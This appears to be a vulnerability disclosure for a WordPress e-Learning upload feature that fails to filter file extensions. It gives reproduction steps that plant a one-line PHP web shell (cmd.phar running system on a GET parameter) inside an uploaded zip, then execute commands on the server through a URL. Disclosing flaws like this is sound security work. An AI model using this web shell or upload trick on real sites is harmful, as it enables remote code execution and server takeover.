Description The plugin is not properly filtering which file extensions are allowed to be imported on the server, allowing the uploading of malicious code within zip files
Note: This must be tested on a web server running Apache
1) Create a new post
2) Add e-Learning block to the post and upload a zip file containing a blank HTML file (e.g. `main.html`) and a Phar filed with the name `cmd.phar`). In `cmd.phar`, add the contents `<?php echo system($_GET['cmd']); ?>`. Malicious .htaccess files works too.
3) After uploading, browse to http://example.com//wp-content/uploads/articulate_uploads/__ZIP_NAME_HERE__/cmd.phar?cmd=ls
4) You will see a listing of contents using the `ls` command